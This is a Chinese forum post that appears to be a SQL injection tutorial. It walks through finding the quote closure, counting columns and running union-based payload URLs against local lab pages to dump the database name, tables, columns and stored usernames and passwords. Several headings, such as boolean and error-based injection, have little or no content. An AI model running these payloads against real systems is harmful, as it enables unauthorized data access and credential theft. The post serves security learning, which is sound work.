ToB企服应用市场:ToB评测及商务社交产业平台

标题: SQL注入 [打印本页]

作者: 泉缘泉    时间: 2022-8-31 00:42
标题: SQL注入



1.转换问题  

    select * from user  where id='1'     
    select * from user  where id='1a'     这两个查询效果是一样的,当id=1a 是查询的是id=1的结果
SQL注入首先搞定的就是闭合问题,常见的闭合方式有以下几种:
 2.  union注入

相关函数:

七步走
1.求闭合字符
 
http://127.0.0.1/ry.php?ry_id=1
http://127.0.0.1/ry.php?ry_id=1'
http://127.0.0.1/ry.php?ry_id=1' -- -
http://127.0.0.1/ry.php?ry_id=1 -- -
http://127.0.0.1/ry.php?ry_id=1 and 1=1-- -
http://127.0.0.1/ry.php?ry_id=1 and 1=2-- -
2.求列数
http://127.0.0.1/ry.php?ry_id=1 order by 1-- -
http://127.0.0.1/ry.php?ry_id=1 order by 2-- -
http://127.0.0.1/ry.php?ry_id=1 order by 3-- -
http://127.0.0.1/ry.php?ry_id=1 order by 4-- -
http://127.0.0.1/ry.php?ry_id=1 order by 5-- -
3.求显示位数
http://127.0.0.1/ry.php?ry_id=1 union select 1,2,3,4-- -
http://127.0.0.1/ry.php?ry_id=-1 union select 1,2,3,4-- -
4.爆数据库
5.爆表名
6.爆列名
7.爆字段名
http://127.0.0.1/ry.php?ry_id=-1 union select 1,2,version(),database()-- -
http://127.0.0.1/ry.php?ry_id=-1 union select 1,2,version(),group_concat(table_name) from information_schema.tables where table_schema=database()-- -
http://127.0.0.1/ry.php?ry_id=-1 union select 1,2,version(),group_concat(column_name) from information_schema.columns where table_schema=database()-- -
http://127.0.0.1/Less-1/?id=-2 union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users'-- -
http://127.0.0.1/Less-1/?id=-2 union select 1,version(),group_concat(id,0x23,username,0x23,password) from users-- -
http://127.0.0.1/Less-1/?id=-2 union select 1,version(),group_concat(id,' ',username,0x23,password) from users-- -
http://127.0.0.1/ry.php?ry_id=-1 union select 1,2,version(),group_concat(l_id,l_title,l_lynr,l_time,l_ip,l_ckroot,l_name,l_mail) from book -- -
3.Bool注入

bool注入属于盲注的一种,他的返回值只有yes或者no
相关函数:

测试链接:http://127.0.0.1/boolean.php?id=1
4.报错注入
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4